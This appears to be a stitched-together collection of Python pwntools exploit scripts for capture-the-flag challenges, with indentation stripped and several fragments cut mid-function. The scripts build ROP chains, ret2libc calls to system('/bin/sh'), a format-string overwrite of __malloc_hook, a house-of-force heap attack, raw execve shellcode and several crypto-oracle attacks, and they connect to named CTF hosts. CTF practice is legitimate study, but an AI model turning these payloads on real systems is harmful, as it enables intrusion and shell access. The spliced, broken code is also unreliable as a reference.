def solve():
cnt = 0
flag = 'picoCTF{@'
# sitrep,agent_code='',''
# message =msg[0] +sitrep+msg[1]+agent_code+msg[2]
for j in range(38 - len(flag)):
for i in string.printable:
# print "flag:",i
r = connect("2018shell.picoctf.com", 31123)
cnt += 1
time.sleep(1)
prompt = r.recvuntil("report: ")
# 113 + (11+16+38+10) + 38 = 226
base = 'fying code is: ' + flag
sitrep = '@' * 11 + base[-15:] + i + '@' * (38 - len(flag) + 10)
# agent_code="#"*38
# message =msg[0] +sitrep+msg[1]+agent_code+msg[2]
# print '\n'.join(map(repr,part_msg(message)))
r.sendline(sitrep)
response = r.recv()
# print len(response)
tmp = part_msg(response, 32)
# print len(tmp)
# print '\n'.join(tmp)
r.close()
# print len(msg[0]+sitrep+msg[1]+flag)/16
if tmp[4] == tmp[len(msg[0] + sitrep + msg[1] + flag) / 16]:
flag += i
break
print "flag:", flag, cnt
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
pr.readline()
line = pr.readline().strip().decode().split()
des3 = DES3.new(
str(int(time())).zfill(16).encode("utf-8"), DES3.MODE_CFB,
b"00000000")
a, b = int(line[0]), int(line[2])
print(a, b)
pr.sendlineafter('>', str(a * b))
pr.readline()
enc = bytes.fromhex(pr.readline().strip().decode())
dec = des3.decrypt(enc)
pr.sendlineafter('>', dec)
print(dec, len(dec))
print(pr.readline())
print(pr.readall(2))
except Exception as e:
print(e)
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
pop_rsi = pwn.p64(
rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address)
print(pop_rdi)
print(pop_rsi)
payload = b"A" * 72
payload += pop_rdi
payload += pwn.p64(0xdeadbeef)
payload += pop_rsi
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(elf.sym['win'])
print(payload, len(payload))
pr.sendafter("joke\n", payload)
pr.sendline()
pr.sendline("cat flag.txt")
print(pr.readall(2))
except Exception as e:
print(e)
finally:
pr.close()
def exploit(remote=False):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
print(pr.readline())
"""
Find padding via gdb
gef➤ info frame
Stack level 0, frame at 0x7fffffffda48:
rip = 0x401153 in vuln; saved rip = 0x6161616161616164
called by frame at 0x7fffffffda58
Arglist at 0x6161616161616163, args:
Locals at 0x6161616161616163, Previous frame's sp is 0x7fffffffda50
Saved registers:
rip at 0x7fffffffda48
gef➤ pattern search 0x6161616161616164
[+] Searching '0x6161616161616164'
[+] Found at offset 24 (little-endian search) likely
[+] Found at offset 17 (big-endian search)
"""
payload = b'a' * 24
# gadgets from output of 'ROPgadget --binary weird-rop-f17e9f493733a383aac548dbf1320c33'
pop_rdx = pwn.p64(0x4010de)
mov_rax_0 = pwn.p64(0x401002)
mov_rax_1 = pwn.p64(0x40100a)
mov_rdi_1 = pwn.p64(0x401012)
xor_rdi_0x53 = pwn.p64(0x40107d)
xor_rdi_0x56 = pwn.p64(0x40101b)
xor_rdi_0x198 = pwn.p64(0x4010c3)
xor_rdi_0x19b = pwn.p64(0x40104c)
if remote:
payload += xor_rdi_0x56
payload += xor_rdi_0x53
else:
payload += xor_rdi_0x19b
payload += xor_rdi_0x198
payload += pop_rdx
payload += pwn.p64(0x19) # read length
payload += mov_rax_0
payload += pwn.p64(rop.find_gadget(['syscall'])[0])
payload += mov_rax_1
payload += mov_rdi_1
payload += pwn.p64(rop.find_gadget(['syscall'])[0])
pr.sendline(payload)
print(pr.readall(2))
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF('baby_bof')
libc = pwn.ELF('libc-2.31.so')
rop = pwn.ROP(elf)
pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
payload = b'A' * 18
payload += pop_rdi
payload += pwn.p64(elf.got['puts'])
payload += pwn.p64(elf.plt['puts'])
payload += pwn.p64(elf.sym['vuln'])
pr.sendlineafter("me\n", payload)
print(pr.readline())
out = pr.readline().strip()
puts_addr = int.from_bytes(out[:8], 'little')
print('puts @', hex(puts_addr))
"""Also works
if remote:
sys = puts_addr - 0x32190
bin_sh = puts_addr + 0x13000a
else:
sys = puts_addr - 0x2e660
bin_sh = puts_addr + 0x116eb6
"""
libc.address = puts_addr - libc.symbols['puts']
sys = libc.symbols['system']
bin_sh = next(libc.search(b'/bin/sh'))
print('sys @', hex(sys))
print('bin_sh @', hex(bin_sh))
ret = pwn.p64(rop.find_gadget(['ret']).address)
payload = b'A' * 18
payload += ret
payload += pop_rdi
payload += pwn.p64(bin_sh)
payload += pwn.p64(sys)
payload += pwn.p64(elf.sym['vuln'])
print(payload)
pr.sendafter('me\n', payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(4))
except Exception as e:
print(e)
finally:
pr.close()
def main():
# p = process(["./ld-2.31.so", "./stack"], env = {"LD_PRELOAD": "./libc-2.31.so"})
p = connect("asu-cse545.com", 6666)
attack = leak_libc()
p.sendline(attack)
print(p.recvline())
print(p.recvline())
s = p.recvline()
base = int.from_bytes(s.strip(), "little") - 0x875a0
print("base address: 0x%x" % base)
def exploit():
pr = pwn.connect(host, port)
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
payload = b"A" * 32
rop.set_lock()
rop.shell()
payload += rop.chain()
print('len:', len(payload), payload)
pr.sendlineafter("What would a hero say ?\n>>> ", payload)
print(pr.readall(2))
def remote():
pr = pwn.connect(host, port)
try:
pr.readline()
while True:
s = pr.readline().decode().strip()
print(s, end=' ')
ans = calc(s)
print(ans)
pr.sendlineafter(': ', str(ans))
except Exception as ex:
pass
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
main_addr = pr.readline().strip().decode()
main_addr = int(main_addr[main_addr.find('street ') + 7:], 16)
print('main @', hex(main_addr))
ca_addr = main_addr + (elf.sym['california'] - elf.sym['main'])
si_addr = main_addr + (elf.sym['silicon_valley'] - elf.sym['main'])
loss_addr = main_addr + (elf.sym['loss'] - elf.sym['main'])
print('ca @', hex(ca_addr))
print('si @', hex(si_addr))
print('loss @', hex(loss_addr))
"""
california() => win_land='/bin'
silicon_valley() => win_land='/bin/sh'
loss(0x1337c0de, 0xdeadc0de-0x1337c0de)
"""
pop_rdi = pwn.p64(main_addr +
(rop.find_gadget(['pop rdi', 'ret']).address -
elf.sym['main']))
pop_rsi = pwn.p64(main_addr + (
rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address -
elf.sym['main']))
payload = b'A' * 40
payload += pwn.p64(ca_addr)
payload += pwn.p64(si_addr)
payload += pop_rdi + pwn.p64(0x1337c0de)
payload += pop_rsi + pwn.p64(0xcb760000) + pwn.p64(0xcb760000)
payload += pwn.p64(loss_addr)
print(len(payload), payload)
pr.sendafter('often?\n', payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(4))
except Exception as e:
print(e)
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
num = int(pr.readline().decode())
print(num)
for i in range(1, num+1):
tri = triangle(num, i)
print(tri)
pr.sendline(str(tri))
print(pr.readall(2))
finally:
pr.close()
def guess(remote, flag):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
pr.sendlineafter('\n> ', flag)
ret = 0
while True:
line = pr.readline().strip()
if line.startswith(b'Ho') or line.startswith(b'We'):
break
ret += len(line.split())
return ret
finally:
pr.close()
def exploit(remote):
pwn.context.clear(bits=64)
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target, env={'LD_PRELOAD': 'libc-2.27.so'})
try:
elf = pwn.ELF(target, False)
libc = pwn.ELF('./libc-2.27.so', False)
# one_gadget libc-2.27.so from libc6_2.27-3ubuntu1.4_amd64.deb
gadgets = [0x4f3d5, 0x4f432, 0x10a41c]
payload = "%{}$p".format(23)
pr.sendlineafter("point\n", payload)
pr.readline()
# 0x00007fffffffda08│+0x0088: 0x00007ffff7dfb082 → <__libc_start_main+231> mov edi, eax
libc_start_main_addr = int(pr.readline().strip().decode(), 16) - 231
libc.sym['gadget'] = gadgets[2]
libc.address = libc_start_main_addr - libc.sym['__libc_start_main']
print('libc @', hex(libc.address))
print('gadget @', hex(libc.sym['gadget']))
print('__libc_start_main @', hex(libc_start_main_addr))
print('__malloc_hook @', hex(libc.sym['__malloc_hook']))
stack_offset = 6
payload = pwn.fmtstr_payload(
stack_offset, {libc.sym["__malloc_hook"]: libc.sym['gadget']},
write_size='short')
print(payload, len(payload))
pr.sendafter("point\n", payload)
pr.sendline()
payload = b"%65537$c"
pr.sendafter("point\n", payload)
pr.sendline()
pr.readline()
pr.sendline('cat flag.txt')
print(pr.readall(2))
except Exception as e:
print(e)
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
print('win_game @', hex(elf.sym['win_game']))
pr.sendlineafter('BOF it to start!\n', 'BOF')
payload = b'A' * 56
payload += pwn.p64(elf.sym['win_game'])
shouted = False
print(payload)
while True:
cmd = pr.readline()
print(cmd)
if b"Twist" in cmd:
if shouted:
pr.send(payload)
pr.sendline()
print(pr.readall(2))
else:
pr.sendline('T')
elif b"Pull" in cmd:
if shouted:
pr.send(payload)
pr.sendline()
print(pr.readall(2))
else:
pr.sendline('P')
elif b"BOF" in cmd:
if shouted:
pr.send(payload)
pr.sendline()
print(pr.readall(2))
else:
pr.sendline('B')
elif b"Shout" in cmd:
pr.send(payload)
pr.sendline()
shouted = True
finally:
pr.close()
def remote():
pr = pwn.connect(host, port)
try:
while True:
pr.readline()
pr.readline()
pr.readline()
n = pr.readline().decode().strip()
print(n, end=' ')
if not n.isnumeric():
break
ans = calc(int(n))
print(ans)
pr.sendline(str(ans))
except Exception as ex:
print(ex)
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
payload = b"A"*24
payload += pwn.p64(0x1337c0de)
print(payload, len(payload))
pr.sendafter("dreaming?\n", payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(2))
except Exception:
pass
finally:
pr.close()
def remote():
pr = pwn.connect(host, port)
try:
pr.readline()
pr.readline()
pr.readline()
while True:
line = pr.readline().decode().strip()
if not line.startswith('M'):
print(line)
break
ms, ds = line.split()
me, de = pr.readline().decode().strip().split()
i1, v1 = pr.readline().decode().strip().split()
i2, v2 = pr.readline().decode().strip().split()
ms = int(ms[1:])
ds = int(ds[1:])
me = int(me[1:])
de = int(de[1:])
i1 = int(i1[1:])
v1 = int(v1[1:])
i2 = int(i2[1:])
v2 = int(v2[1:])
print(f'ms={ms} ds={ds}')
print(f'me={me} de={de}')
print(f'i1={i1} v1={v1}')
print(f'i2={i2} v2={v2}')
ans = calc(ms,ds,me,de,i1,v1,i2,v2)
print(f'ans={ans}')
pr.sendline(str(ans))
print(pr.readline())
print(pr.readline())
print(pr.readline())
print(pr.readall(2))
except Exception as ex:
print(ex)
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
payload = ''
for i in range(11, 7, -1):
payload += "%{}$lx".format(i)
pr.sendafter("name?\n", payload)
pr.sendline()
s = pr.readall(2).decode().strip()
s = s[s.find(' ') + 1:]
print(s)
print(''.join(
reversed(''.join(
[chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2)]))))
except Exception as e:
print(e)
finally:
pr.close()
def find_shuffled():
ALPHABET = string.ascii_letters + string.digits + "_!@#$%.'\"+:;<=}{"
shuffled = []
pr = pwn.connect(host, port)
ret = ''
try:
pr.readline()
flag = pr.readline().strip().decode()
for a in ALPHABET:
pr.sendlineafter('>', a * len(flag))
pr.readline()
enc = pr.readline().strip().decode()
print(a, enc)
shuffled.append(enc[0])
for a in flag:
i = shuffled.index(a)
ret += ALPHABET[i]
finally:
pr.close()
return ret
def exploit():
pr = pwn.connect(host, port)
try:
pr.readline()
pr.sendline('{"option":"sign","message":""}')
"""
c0 = e(key)
c1 = e(padding)
"""
c1 = bytes.fromhex(
json.loads(pr.readline().strip().decode())["signature"])
data = b'admin=True' + b'\x06' * 6
fake = pwn.xor(AES.new(data, AES.MODE_ECB).encrypt(c1), c1).hex()
"""
p0 = key
p1 = padding_16
p2 = admin=True + padding_6
"""
data = (b'\x10' * 16 + b'admin=True').hex()
pr.sendline(
f'{{"option":"get_flag","signature":"{fake}","message":"{data}"}}')
print(pr.readline())
finally:
pr.close()
def exploit():
pr = pwn.connect(host, port)
try:
pr.readuntil(": ")
line = json.loads(pr.readline().strip().decode())
#p = int(line['p'][2:].strip('f'), 16)
p = int(line['p'], 16)
g = int(line['g'], 16)
A = int(line['A'], 16)
payload = json.dumps({"p": hex(p), "g": hex(g), "A": hex(p)})
print(payload, len(payload))
pr.sendlineafter(": ", payload)
pr.readuntil(": ")
line = json.loads(pr.readline().strip().decode())
B = int(line['B'], 16)
payload = json.dumps({"B": hex(p)})
print(payload, len(payload))
pr.sendlineafter(": ", payload)
pr.readuntil(": ")
line = json.loads(pr.readline().strip().decode())
print(line)
iv = bytes.fromhex(line['iv'])
encrypted_flag = bytes.fromhex(line['encrypted_flag'])
sha1 = hashlib.sha1()
secret = 0
sha1.update(str(secret).encode())
key = sha1.digest()[:16]
aes = AES.new(key, AES.MODE_CBC, iv)
print(aes.decrypt(encrypted_flag))
finally:
pr.close()
p.sendafter('Please enter the name of item:', payload)
return None
def change_item(p, index, size, payload):
print 'change_item', str(index), str(size), repr(payload)
p.sendlineafter('Your choice:', '3')
p.sendlineafter('Please enter the index of item:', str(index))
p.sendlineafter('Please enter the length of item name:', str(size))
p.sendafter('Please enter the new name of the item:', payload)
return None
# The house of force
if __name__ == '__main__':
if pwnlib.args.args['REMOTE']:
p = pwn.connect('csie.ctf.tw', 10138)
else:
p = pwn.process('./bamboobox-649a39b0d66eb71eec94b300a629e9f645bd75ad')
size_of_first_block = 0x30
p.settimeout(PIPE_CLEAN_TIME)
add_item(p, size_of_first_block, 'x'*(size_of_first_block-1) )
payload = 'y'*size_of_first_block
payload += '\x00'*8 # prev_size
payload += '\xFF'*8 # size, top chunk size to negative
change_item(p, 0, len(payload)+1, payload)
add_item(p, -size_of_first_block-0x10-0x20-0x10, '')
add_item(p, 0x10, pwn.p64(MAGIC_ADDRESS)*2)
import pwn
import pwnlib
pwn.context.clear(arch='amd64')
pwn.context.terminal = ['tmux', 'splitw', '-h']
shellcode = "\xB3\x02\x49\xBC\x2D\x62\x69\x6E\x2F\x73\x68\x00\x4C\x01\xE3\x53\x48\x8D\x3C\x24\xB0\x3B\x0F\x05"
if __name__ == '__main__':
if pwnlib.args.args['REMOTE']:
p = pwn.connect('52.69.40.204', 8361)
else:
p = pwn.process('./easy_to_say-c7dd6cdf484305f7aaac4fa821796871')
print repr(shellcode)
p.sendafter('Give me your code :', shellcode)
p.interactive()
if not ONLINE:
LIBC_PATH = "/lib/i386-linux-gnu/libc.so.6"
if GDB_BEGIN:
log("Starting with GDB BEGIN")
c = pwn.gdb.debug(BINARY_PATH, GDB_SCRIPT)
else:
log("Starting \"{}\"".format(BINARY_PATH))
c = pwn.process(BINARY_PATH)
if GDB_DEBUG:
log("Attaching GDB")
pwn.gdb.attach(c, GDB_SCRIPT)
else:
LIBC_PATH = "./libc-2.27.so"
c = pwn.connect(HOST, PORT)
LIBC = pwn.ELF(LIBC_PATH)
# Really gross way of parsing out the leaked data...
def grossLeak(leak, payload):
try:
# Get what we're interested in.
leak = "'$'".join(
leak.split("': No such file")[0].split(
payload[-4:])[1:]).split("'$'")
# Remove empty elements.
leak = [l for l in leak if len(l) > 0]
# Converting from "\\xx\\xx\\xx" ascrii representation to raw bytes.
for i, x in enumerate(leak):
from pwnlib import shellcraft
from pwnlib.args import args
from pwn import connect, process, p64, asm
shellcode = shellcraft.amd64.linux.sh()
shellcode = asm(shellcode, arch='amd64', os='linux')
print len(shellcode)
payload = 'x' * 248 + p64(0x601080)
if args['REMOTE']:
p = connect('csie.ctf.tw', 10126)
else:
p = process('./ret2sc-a6a74cce51b034b6570e5416a38973c195d1b414')
p.sendline(shellcode)
p.sendline(payload)
p.interactive()
import pwn
#proc = pwn.process('../challenge/src/adder')
proc = pwn.connect('localhost', 12345)
proc.recvuntil('add> ')
proc.sendline('debug')
proc.recvuntil('main @ ')
main_addr_s = proc.recvline().strip()
proc.recvuntil('printf @ ')
printf_addr_s = proc.recvline().strip()
proc.recvuntil('malloc @ ')
malloc_addr_s = proc.recvline().strip()
main_addr, printf_addr, malloc_addr = (int(main_addr_s,
0), int(printf_addr_s,
0), int(malloc_addr_s, 0))
print(main_addr, printf_addr, malloc_addr)
sub_rsp_addr = main_addr - 0x11e5 + 0x17f6
flag_addr = main_addr - 0x11e5 + 0x20e6
print_asciiart = main_addr - 0x11e5 + 0x1749
rop_nop = main_addr - 0x11e5 + 0x17fd
pop_rdi_addr = main_addr - 0x11e5 + 0x17ee
proc.recvuntil('RSP is ')
reg_line = proc.recvline().split(b',')
rsp = int(reg_line[0], 0)
rbp = int(reg_line[1].split(b' ')[3], 0)
print(rsp, rbp)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = pwn.connect(host, port)
if pwn.args.GDB:
pwn.gdb.attach(io, gdbscript=gdbscript)
return io
def __init__(self, remote):
if remote:
self.pr = pwn.connect(host, port)
else:
self.pr = pwn.process(target)
